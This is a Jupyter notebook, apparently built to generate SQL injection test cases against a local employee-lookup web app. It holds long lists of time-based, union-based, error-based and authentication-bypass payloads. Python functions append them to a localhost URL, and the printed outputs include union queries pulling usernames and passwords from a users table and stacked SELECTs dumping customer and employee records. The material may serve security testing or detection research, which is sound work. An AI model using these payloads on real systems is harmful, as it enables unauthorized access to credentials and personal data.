plain text inject

In [58]:
#Time Based SQL Injection
Time_Based =[''' ' ;waitfor delay '0:0:5'-- ''',
''' ' );waitfor delay '0:0:5'-- ''',
''' ' ;waitfor delay '0:0:5'-- ''',
''' ' );waitfor delay '0:0:5'-- ''',
''' ' ));waitfor delay '0:0:5'-- ''',
''' ' ));waitfor delay '0:0:5'-- ''',
''' ' benchmark(10000000,MD5(1))#''',
''' ' 1 or benchmark(10000000,MD5(1))#''',
''' '(1)r benchmark(10000000,MD5(1))#''',
''' ' or benchmark(10000000,MD5(1))#''',
''' ' 1) or benchmark(10000000,MD5(1))#''',
''' ' ) or benchmark(10000000,MD5(1))#''',
''' ' ) or benchmark(10000000,MD5(1))#''',
''' ' 1)) or benchmark(10000000,MD5(1))#''',
''' ' )) or benchmark(10000000,MD5(1))#''',
''' ' 1 or pg_sleep(5)-- ''',
''' ' (1)r pg_sleep(5)-- ''',
''' ' or pg_sleep(5)-- ''',
''' ' 1) or pg_sleep(5)-- ''',
''' ' ) or pg_sleep(5)-- ''',
''' ' ) or pg_sleep(5)-- ''',
''' ' 1)) or pg_sleep(5)-- ''',
''' ' )) or pg_sleep(5)-- ''',
''' ' )) or pg_sleep(5)-- ''',
''' ' AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe''',
''' ' AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'=' ''',
''' ' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)''',
''' ' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- ''',
''' ' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#''',
''' ' SLEEP(5)#''',
''' ' SLEEP(5)-- ''',
''' ' SLEEP(5)=" ''',
''' ' (1)r SLEEP(5)''',
''' ' (1)r SLEEP(5)#''',
''' ' (1)r SLEEP(5)-- ''',
''' ' (1)r SLEEP(5)="''',
''' ' waitfor delay '00:00:05' ''',
''' ' waitfor delay '00:00:05'-- ''',
''' ' waitfor delay '00:00:05'#''',
''' ' benchmark(50000000,MD5(1))''',
''' ' benchmark(50000000,MD5(1))-- ''',
''' ' benchmark(50000000,MD5(1))#''']

In [47]:
#Union Select
union_based = [ 
     " ' ORDER BY SLEEP(5)#",
     " ' ORDER BY 1,SLEEP(5)#",
     " ' ORDER BY 1,SLEEP(5),3#",
     " ' ORDER BY 1,SLEEP(5),3,4#",
     ''' ' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5("A")),4,5#''',
     " ' ORDER BY SLEEP(5)-- ",
     " ' ORDER BY 1,SLEEP(5)-- ",
     " ' ORDER BY 1,SLEEP(5),3-- ",
     " ' ORDER BY 1,SLEEP(5),3,4-- ",
     ''' ' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5("A")),4,5-- ''',
     " ' UNION ALL SELECT 1",
     " ' UNION ALL SELECT 1,2",
     " ' UNION ALL SELECT 1,2,3",
     " ' UNION ALL SELECT 1#",
     " ' UNION ALL SELECT 1,2#",
     " ' UNION ALL SELECT 1,2,3#",
     " ' UNION ALL SELECT 1,2,3,4#",
     " ' UNION ALL SELECT 1-- ",
     " ' UNION ALL SELECT 1,2-- ",
     " ' UNION ALL SELECT 1,2,3-- ",
     " ' UNION ALL SELECT 1,2,3,4-- ",
     " ' UNION SELECT @@VERSION,SLEEP(5),3",
     " ' UNION SELECT @@VERSION,SLEEP(5),USER(),4",
     ''' ' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5''',
     ''' ' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5,6''',
     ''' ' UNION SELECT @@VERSION,SLEEP(5),USER(),4#''',
     ''' ' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5#''',
     ''' ' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5,6#''',
     ''' ' UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5("A")),NULL,NULL -- ''',
     ''' ' UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5("A")),NULL,NULL,NULL -- '''
     ]

In [60]:
Bypass = [
    ''' ' or true -- ''",
    " ' or true -- ",
    " ' or true -- ",
    " ) or true -- ",
    " ') or true -- ",
    " ' or 'x'='x",
    " ') or ('x')=('x",
    " ') or (('x'))=(('x",
    ''' ' or "x"="x ''',
    ''' ') or ("x")=("x ''',
    ''' ')) or (("x"))=(("x ''',
    " ' or 1=1",
    " ' or 1=1-- ",
    " ' or 1=1#",
    " ' or 1=1/*",
    " ' -- ",
    "' #",
    "'/*",
    "' or '1'='1",
    "' or '1'='1'-- ",
    "' or '1'='1'#",
    "' or '1'='1'/*",
    "'or 1=1 or ''='",
    "' or 1=1",
    "' or 1=1-- ",
    "' or 1=1#",
    "' or 1=1/*",
    "') or ('1'='1",
    "') or ('1'='1'-- ",
    "') or ('1'='1'#",
    "') or ('1'='1'/*",
    "') or '1'='1",
    "') or '1'='1'-- ",
    "') or '1'='1'#",
    "') or '1'='1'/*",
    ''' 1234 ' AND 1=0 UNION ALL SELECT 'admin", '81dc9bdb52d04dc20036dbd8313ed055 ''',
    ''' \" -- " ''',
    ''' \" #''',
    ''' \"/*''',
    ''' \' Or \"1\"=\"1 ''',
    ''' \' Or \"1\"=\"1\"-- ''',
    ''' \' Or \"1\"=\"1\"# ''',
    ''' \' Or \"1\"=\"1\"/* ''',
    ''' \"or 1=1 or \"\"=\" ''',
    ''' \' Or 1=1''',
    ''' \' Or 1=1-- ''',
    ''' \' Or 1=1#''',
    ''' \' Or 1=1/*''',
    ''' \") or (\"1\"=\"1''',
    ''' \") or (\"1\"=\"1\"-- ''',
    ''' \") or (\"1\"=\"1\"#''',
    ''' \") or (\"1\ '''
    ]

Gen-test-case!

In [24]:
import random

In [62]:
# errorbase -->
# Time_Based[]
# Bypass[]
table_name = ["employee","customer","service","users"]
user = ['lnwza007','eiei123']

In band
1.error-based
2.union

In [63]:
errorbase=[
"OR 1=1#",
"OR 1=0#",
"OR x=x#",
"OR x=y#",
"OR 1=1-- ",
"OR 1=0-- ",
"OR x=x-- ",
"OR x=y-- ",
"OR 3409=3409 AND ('pytW' LIKE 'pytW",
"OR 3409=3409 AND ('pytW' LIKE 'pytY",
"HAVING 1=1",
"HAVING 1=0",
"HAVING 1=1#",
"HAVING 1=0#",
"HAVING 1=1-- ",
"HAVING 1=0-- ",
"AND 1=1",
"AND 1=0",
"AND 1=1-- ",
"AND 1=0-- ",
"AND 1=1#",
"AND 1=0#",
"AND 1=1 AND '%'='",
"AND 1=0 AND '%'='",
"AND 1083=1083 AND (1427=1427",
"AND 7506=9091 AND (5913=5913",
"AND 1083=1083 AND ('1427=1427",
"AND 7506=9091 AND ('5913=5913",
"AND 7300=7300 AND 'pKlZ'='pKlZ",
"AND 7300=7300 AND 'pKlZ'='pKlY",
"AND 7300=7300 AND ('pKlZ'='pKlZ",
"AND 7300=7300 AND ('pKlZ'='pKlY",
"AS INJECTX WHERE 1=1 AND 1=1",
"AS INJECTX WHERE 1=1 AND 1=0",
"AS INJECTX WHERE 1=1 AND 1=1#",
"AS INJECTX WHERE 1=1 AND 1=0#",
"AS INJECTX WHERE 1=1 AND 1=1-- ",
"AS INJECTX WHERE 1=1 AND 1=0-- ",
"WHERE 1=1 AND 1=1",
"WHERE 1=1 AND 1=0",
"WHERE 1=1 AND 1=1#",
"WHERE 1=1 AND 1=0#",
"WHERE 1=1 AND 1=1-- ",
"WHERE 1=1 AND 1=0-- ",
"ORDER BY 1-- ",
"ORDER BY 2-- ",
"ORDER BY 3-- ",
"ORDER BY 4-- ",
"ORDER BY 5-- ",
"ORDER BY 6-- ",
"ORDER BY 7-- ",
"ORDER BY 8-- ",
"ORDER BY 9-- ",
"ORDER BY 10-- ",
"ORDER BY 11-- ",
"ORDER BY 12-- ",
"ORDER BY 13-- ",
"ORDER BY 14-- ",
"ORDER BY 15-- ",
"ORDER BY 16-- ",
"ORDER BY 17-- ",
"ORDER BY 18-- ",
"ORDER BY 19-- ",
"ORDER BY 20-- ",
"ORDER BY 21-- ",
"ORDER BY 22-- ",
"ORDER BY 23-- ",
"ORDER BY 24",
"ORDER BY 25",
"ORDER BY 26",
"ORDER BY 27",
"ORDER BY 28",
"ORDER BY 29",
"ORDER BY 30",
"ORDER BY 31337",
"RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
"RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
"IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl-- ",
"IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl-- ",
"%' AND 8310=8310 AND '%'='",
"%' AND 8310=8311 AND '%'='",
"and (select substring(@@version,1,1))='X'",
"and (select substring(@@version,1,1))='M'",
"and (select substring(@@version,2,1))='i'",
"and (select substring(@@version,2,1))='y'",
"and (select substring(@@version,3,1))='c'",
"and (select substring(@@version,3,1))='S'",
"and (select substring(@@version,3,1))='X'"]

In [64]:
def random_data(list_data):
    BP_gen=[]
    for i in range(30) :
        BP_gen.append(user[random.randint(0, len(user)-1)]+" ' "  +
        list_data[random.randint(0, len(list_data)-1)] )
    return BP_gen

In [65]:
random_data(errorbase)

["eiei123 ' %' AND 8310=8310 AND '%'='",
 "lnwza007 ' AND 1=1#",
 "eiei123 ' ORDER BY 4-- ",
 "eiei123 ' AND 7300=7300 AND 'pKlZ'='pKlZ",
 "eiei123 ' HAVING 1=0#",
 "lnwza007 ' ORDER BY 19-- ",
 "lnwza007 ' ORDER BY 10-- ",
 "eiei123 ' ORDER BY 5-- ",
 "eiei123 ' HAVING 1=1",
 "lnwza007 ' and (select substring(@@version,1,1))='M'"]

URL
(finished)

In [1]:
import random
url= "http://localhost:3000/employee?id="
see_able_col=["employee_id" ,
    "prefixname" ,
    "fname",
    "lname" ,
    "nickname" ,
    "email",
    "tel" ,
    "work_background" ,
    "graduation_certificate" ,
    "address" ,
    "id_card" ,
    "house_registration" ]
unsee_col=["price",
            "name",
            "tel",
            "email",
            "lname",
            "fname",
            "customer_id",
            "username",
            "password"
            ]
see_able_value= [("E001", "Mr.", "bobo1", "two1", "baba1", "E001@gmail.com", '0123456781' , "companyA, companyB", "XAU", "123 r.xxxxx 50200", "1530302340921", "123 r.xxxxx 54000"), 
       ("E002", "Mr.", "bobo2", "two2", "baba2", "E002@gmail.com", '0123456782' , "companyA, companyB", "XAU", "123 r.xxxxx 50200", "1530302340922", '123 r.xxxxx 54000'), 
       ("E003", "Mr.", "bobo3", "two3", "baba3", "E003@gmail.com", '0123456783' , "companyA, companyB", "XAU", "123 r.xxxxx 50200", "1530302340923", '123 r.xxxxx 54000'), 
       ("E004", "Mr.", "bobo4", "two4", "baba4", "E004@gmail.com", '0123456784' , "companyA, companyB", "XAU", "123 r.xxxxx 50200", "1530302340924", '123 r.xxxxx 54000'), 
       ("E005", "Mr.", "bobo5", "two5", "baba5", "E005@gmail.com", '0123456785' , "companyA, companyB", "XAU", "123 r.xxxxx 50200", "1530302340925", '123 r.xxxxx 54000')]
unsee_value={"price":["100","200","300","400"],
            "name":["A","B","C","D"],
            "tel":["0123456781", "0123456782"],
            "email":["E001@gmail.com", "E002@gmail.com"],
            "lname":["memo1", "memo2"],
            "fname":["one1", "one2"],
            "customer_id":["C001","C002"],
            "username":["lnwza007","eiei123"],
            "password":["123","123"]}

unsee_table =["users","service","customer"]

table_value ={"users":["username","password"],
              "service":["name","price"],
              "customer":["fname","customer_id","lname","email","tel"]
            }

In [3]:
unsee_t=unsee_table[random.randint(0, len(unsee_table)-1)]
print(unsee_t)
table_V=table_value[unsee_t][random.randint(0, len(table_value[unsee_t])-1)]
print(table_V)
unsee_v=unsee_value[table_V][random.randint(0, len(unsee_value[table_V])-1)]

print(unsee_v)

users
password
123

In [68]:
def random_urldata(url,list_data,value):
    gen=[]
    for i in range(30) :
        random_table_value=random.randint(0, len(value)-1)
        gen.append(url+(value[random_table_value][0])
        +list_data[random.randint(0, len(list_data)-1)])
    return gen

In [69]:
random_urldata(url,errorbase,see_able_value)

["http://localhost:3000/employee?id=E002AND 1083=1083 AND ('1427=1427",
 'http://localhost:3000/employee?id=E004ORDER BY 14-- ',
 'http://localhost:3000/employee?id=E001AND 1=1',
 'http://localhost:3000/employee?id=E002AND 1=0-- ',
 'http://localhost:3000/employee?id=E004HAVING 1=0-- ',
 'http://localhost:3000/employee?id=E005OR x=x#',
 'http://localhost:3000/employee?id=E002HAVING 1=0#',
 'http://localhost:3000/employee?id=E004ORDER BY 24',
 'http://localhost:3000/employee?id=E004ORDER BY 8-- ',
 'http://localhost:3000/employee?id=E001ORDER BY 27',
 'http://localhost:3000/employee?id=E003HAVING 1=0#',
 'http://localhost:3000/employee?id=E003AS INJECTX WHERE 1=1 AND 1=1',
 'http://localhost:3000/employee?id=E005OR 1=0-- ',
 "http://localhost:3000/employee?id=E003AND 7300=7300 AND ('pKlZ'='pKlY",
 'http://localhost:3000/employee?id=E001ORDER BY 6-- ',
 'http://localhost:3000/employee?id=E005ORDER BY 21-- ',
 'http://localhost:3000/employee?id=E002AS INJECTX WHERE 1=1 AND 1=1#',
 'http://localhost:3000/employee?id=E004HAVING 1=1#',
 "http://localhost:3000/employee?id=E001OR 3409=3409 AND ('pytW' LIKE 'pytW",
 'http://localhost:3000/employee?id=E005ORDER BY 7-- ',
 'http://localhost:3000/employee?id=E003ORDER BY 6-- ',
 'http://localhost:3000/employee?id=E002ORDER BY 25',
 'http://localhost:3000/employee?id=E002ORDER BY 19-- ',
 'http://localhost:3000/employee?id=E002ORDER BY 18-- ',
 'http://localhost:3000/employee?id=E005OR 1=0-- ',
 'http://localhost:3000/employee?id=E002ORDER BY 27',
 'http://localhost:3000/employee?id=E002HAVING 1=1',
 'http://localhost:3000/employee?id=E003AND 1=0',
 "http://localhost:3000/employee?id=E001AND 1=0 AND '%'='",
 'http://localhost:3000/employee?id=E001IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl-- ']

In [48]:
def randomunion_urldata(url,list_data,value):
    gen=[]
    for i in range(10) :
        random_table_value=random.randint(0, len(value)-1)
        gen.append(url+(value[random_table_value][0])
        +list_data[random.randint(0, len(list_data )-1)])
    return gen

In [49]:
randomunion_urldata(url,union_based ,see_able_value)

["http://localhost:3000/employee?id=E004 ' UNION SELECT @@VERSION,SLEEP(5),USER(),4",
 "http://localhost:3000/employee?id=E002 ' UNION ALL SELECT 1,2-- ",
 "http://localhost:3000/employee?id=E003 ' ORDER BY 1,SLEEP(5)-- ",
 "http://localhost:3000/employee?id=E004 ' UNION ALL SELECT 1",
 'http://localhost:3000/employee?id=E004 \' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5("A")),4,5-- ',
 "http://localhost:3000/employee?id=E005 ' ORDER BY 1,SLEEP(5)#",
 "http://localhost:3000/employee?id=E003 ' UNION SELECT @@VERSION,SLEEP(5),3",
 'http://localhost:3000/employee?id=E002 \' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5,6',
 "http://localhost:3000/employee?id=E001 ' ORDER BY SLEEP(5)-- ",
 "http://localhost:3000/employee?id=E001 ' UNION SELECT @@VERSION,SLEEP(5),USER(),4#"]

In [4]:
def randomunionWrealdata_urldata(url,value,table_value,unsee_table,unsee_value):
    gen=[]
    for i in range(100) :
        unsee_t=unsee_table[random.randint(0, len(unsee_table)-1)] #select table
        table_V=table_value[unsee_t][random.randint(0, len(table_value[unsee_t])-1)] # colum
        unsee_v=unsee_value[table_V][random.randint(0, len(unsee_value[table_V])-1)] # value in that column
        random_table_value=random.randint(0, len(value)-1)
        gen.append(url+(value[random_table_value][0])+' " '
        +"UNION SELECT "+ table_V + " " + "FROM " +unsee_t+ "-- ")
    return gen

In [5]:
randomunionWrealdata_urldata(url,see_able_value,table_value,unsee_table,unsee_value)

['http://localhost:3000/employee?id=E001 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT tel FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT email FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT tel FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT tel FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT email FROM customer-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT tel FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT email FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT email FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT tel FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT username FROM users-- ']

In [ ]:
random_urldata(url,Time_Based,see_able_value)

["http://localhost:3000/employee?id=E002 ' AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'=' ",
 "http://localhost:3000/employee?id=E002 ' 1)) or pg_sleep(5)-- ",
 "http://localhost:3000/employee?id=E005 ' )) or benchmark(10000000,MD5(1))#",
 "http://localhost:3000/employee?id=E003 ' ));waitfor delay '0:0:5'-- ",
 "http://localhost:3000/employee?id=E003 ' 1)) or benchmark(10000000,MD5(1))#",
 "http://localhost:3000/employee?id=E003 ' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- ",
 "http://localhost:3000/employee?id=E005 ' (1)r SLEEP(5)-- ",
 "http://localhost:3000/employee?id=E005 ' ) or pg_sleep(5)-- ",
 "http://localhost:3000/employee?id=E003 ' ;waitfor delay '0:0:5'-- ",
 "http://localhost:3000/employee?id=E002 ' 1)) or pg_sleep(5)-- "]

In [4]:
import string
import random

showList = ["DATABASES", "TABLES", "COLUME"]

last = ["#", "# ", "-- "]
table =["users","service","customer", "employee"]
operator = [" OR ", " AND ", ""]

table_value ={"users":["username","password"],
              "service":["name","price"],
              "customer":["fname","customer_id","lname","email","tel"],
              "employee":["employee_id", "prefixname", "fname", "lname", "nickname", "email", "tel", "work_background", "graduation_certificate", "address", "id_card", "house_registration"]
            }

type_of_value = {"username":"str",
"fname":"str",
"lname":"str",
"name":"str",
"prefixname":"str",
"nickname":"str",
"password":"both",
"customer_id":"both",
"email":"both",
"employee_id":"both",
"work_background":"both",
"graduation_certificate":"both",
"address":"both",
"house_registration":"both",
"tel":"tel",
"price":"price",
"id_card":"id_card"}


customer_value = [{"username":"Emma","password":"u8N6tK9g"},{"username1":"Noah","password1":"p7H5jM6z"},
{"username":"Olivia","password":"h9L8kQ2t"},{"username1":"Liam","password1":"z5T8gP9u"},
{"username":"Ava","password":"b8K6tH7m"},{"username1":"Mason","password1":"y2Q9uH5t"},
{"username":"Sophia","password":"m6J8hK7z"},{"username1":"Jacob","password1":"w8T6pH9g"},
{"username":"Isabella","password":"x5P9uN8t"},{"username1":"William","password1":"g8K7tZ9h"},
{"username":"Mia","password":"t8J6pH7u"},{"username1":"Ethan","password1":"y9L8kQ5t"},
{"username":"Charlotte","password":"m7H9jK8z"},{"username1":"James","password1":"w6T7pH5g"},
{"username":"Amelia","password":"x8P6uN7t"},{"username1":"Alexander","password1":"g7K9tZ8h"},
{"username":"Abigail","password":"t6J8pH9u"},{"username1":"Michael","password1":"y5L7kQ8t"},
{"username":"Emily","password":"m8H6jK9z"},{"username1":"Benjamin","password1":"w7T9pH6g"},
{"username":"Elizabeth","password":"x6P8uN5t"},{"username1":"Matthew","password1":"g9K7tZ7h"},
{"username":"Avery","password":"t8J9pH6u"},{"username1":"Daniel","password1":"y7L8kQ9t"},
{"username":"Sofia","password":"m6H7jK8z"},{"username1":"Joseph","password1":"w5T6pH7g"},
{"username":"Evelyn","password":"x9P7uN8t"},{"username1":"Samuel","password1":"g7K8tZ9h"},
{"username":"Aubrey","password":"t7J6pH8u"},{"username1":"Christopher","password1":"y8L9kQ7t"},
{"username":"Harper","password":"m9H7jK6z"},{"username1":"Nathan","password1":"w6T8pH5g"},
{"username":"Aria","password":"x7P9uN7t"},{"username1":"Ryan","password1":"g8K7tZ9h"},
{"username":"Adalynn","password":"t6J8pH9u"},{"username1":"Andrew","password1":"y5L7kQ8t"},
{"username":"Ellie","password":"m8H6jK9z"},{"username1":"Oliver","password1":"w7T9pH6g"},
{"username":"Scarlett","password":"x6P8uN5t"},{"username1":"Henry","password1":"g9K7tZ7h"},
{"username":"Aaliyah","password":"t8J9pH6u"},{"username1":"Jaxon","password1":"y7L8kQ9t"}]


def generate_random_string_both() -> str:
    length = random.randint(4, 15)
    letters = string.ascii_letters + string.digits
    rand = ''.join(random.choice(letters) for i in range(length))
    final = '"' + rand + '"'
    return final

def generate_random_string_str() -> str:
    length = random.randint(4, 15)
    letters = string.ascii_letters
    rand = ''.join(random.choice(letters) for i in range(length))
    final = '"' + rand + '"'
    return final

def generate_random_string_tel() -> str:
    return "0" + str(random.randint(100000000, 999999999))

def generate_random_string_id_card() -> str:
    return "1" + str(random.randint(500000000000, 999999999999))

def generate_random_string_price() -> str:
    letters = string.digits
    return ''.join(random.choice(letters) for i in range(3))

In [5]:
def randomSelectForSearch(table, table_value, last):
    gen=[]
    for i in range(100) :
        preStr =""
        typeOfValue=[]
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        preStr += '\";'+" SELECT "
        
        numOfParam=random.randint(0, len(table_value[random_table])-1)
        if (numOfParam == 0):
            preStr += "*" + " FROM " + random_table + "" + random_last
        else:
            for j in range(numOfParam) :
                while True:
                    random_table_value=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
                    if random_table_value not in preStr:
                        typeOfValue.append(type_of_value[random_table_value])
                        break
                    continue 
                    
                preStr += random_table_value
                if j != numOfParam-1 :
                    preStr += ", "
            preStr += " FROM " + random_table
            preStr += "" + random_last
        
        if preStr in gen:
            continue
        else:
            gen.append(preStr)
    return gen

In [6]:
randomSelectForSearch(table, table_value, last)

['"; SELECT email FROM customer#',
 '"; SELECT * FROM service# ',
 '"; SELECT fname, tel, customer_id, lname FROM customer# ',
 '"; SELECT * FROM users-- ',
 '"; SELECT tel, customer_id, email FROM customer#',
 '"; SELECT fname, customer_id, email FROM customer#',
 '"; SELECT password FROM users#',
 '"; SELECT username FROM users-- ',
 '"; SELECT lname, email, customer_id FROM customer-- ',
 '"; SELECT * FROM users# ',
 '"; SELECT * FROM customer#',
 '"; SELECT tel, customer_id, fname FROM customer# ',
 '"; SELECT house_registration, employee_id FROM employee-- ',
 '"; SELECT * FROM service-- ',
 '"; SELECT customer_id, fname, tel, lname FROM customer# ',
 '"; SELECT email, lname FROM employee#',
 '"; SELECT tel, id_card, graduation_certificate FROM employee# ',
 '"; SELECT email, customer_id, fname, tel FROM customer#',
 '"; SELECT price FROM service#',
 '"; SELECT password FROM users-- ',
 '"; SELECT name FROM service# ',
 '"; SELECT tel, customer_id, fname, email FROM customer#',
 '"; SELECT fname FROM customer# ',
